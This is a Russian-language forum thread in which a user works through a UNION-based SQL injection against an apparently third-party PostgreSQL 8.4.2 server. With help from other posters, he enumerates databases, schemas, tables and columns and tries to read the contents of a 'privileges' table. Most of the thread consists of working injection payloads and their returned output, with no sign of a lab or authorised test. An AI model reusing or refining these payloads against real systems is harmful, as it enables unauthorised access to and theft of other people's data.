 |
24.06.2012, 03:13
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
С нами:
10643155
Репутация:
0
|
|
Версия: PostgreSQL 8.4.2
Выполняю запрос:
Код HTML:
-' union select null,null,null,null,null,current_database()--
Ответ:
somedatadb
Второй запрос:
Код HTML:
-' union select null,null,null,null,null,datname FROM pg_database--
Ответ:
db1
db2
db3
Вопрос: Как можно смодулировать запрос с учетом предыдущего примера запроса, чтобы посмотреть содержимое db2. (пользователь имеет доступ на просмотр)
Пробывал
Код HTML:
-' union select null,null,null,null,null,table_name FROM db2--
но не работает. Может я что-то делаю не правильно? |
|
|
24.06.2012, 04:06
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Для начала начните использовать information_schema в PostgreSQL она тоже есть!
|
|
|
|
24.06.2012, 04:09
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
С нами:
10643155
Репутация:
0
|
|
Делал уже, но как-то выдает таблицы базы в которой я нахожусь а не соседней:
Код HTML:
-' union select null,null,null,null,null,table_name FROM information_schema.tables WHERE table_schema = 'public'--
-' union select null,null,null,null,null,column_name FROM information_schema.columns WHERE table_name ='user_log'--
-' union select null,null,null,null,null,var_name FROM user_log--
Но мне нужен запрос который "покажет" соседнюю базу. |
|
|
|
24.06.2012, 04:43
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами:
8784803
Репутация:
257
|
|
schema_name from information_schema.schemata
Если не ошибаюсь
|
|
|
|
24.06.2012, 05:05
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
С нами:
10643155
Репутация:
0
|
|
Разобрался:
Этот запрос показывает все таблицы (включая таблицы других баз)
Код HTML:
-' union select null,null,null,null,null,table_name FROM information_schema.tables
Показываем колонны в найденных таблицах:
Код HTML:
-' union select null,null,null,null,null,column_name FROM information_schema.columns WHERE table_name ='privileges'--
Вывод:
server_ID
usr_ID
priv_type
А как собственно посмотреть данные этих колонн?
Такой запрос просто не показывает каких либо данных....
Код HTML:
-' union select null,null,null,null,null,cast(server_ID as text) FROM privileges--
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
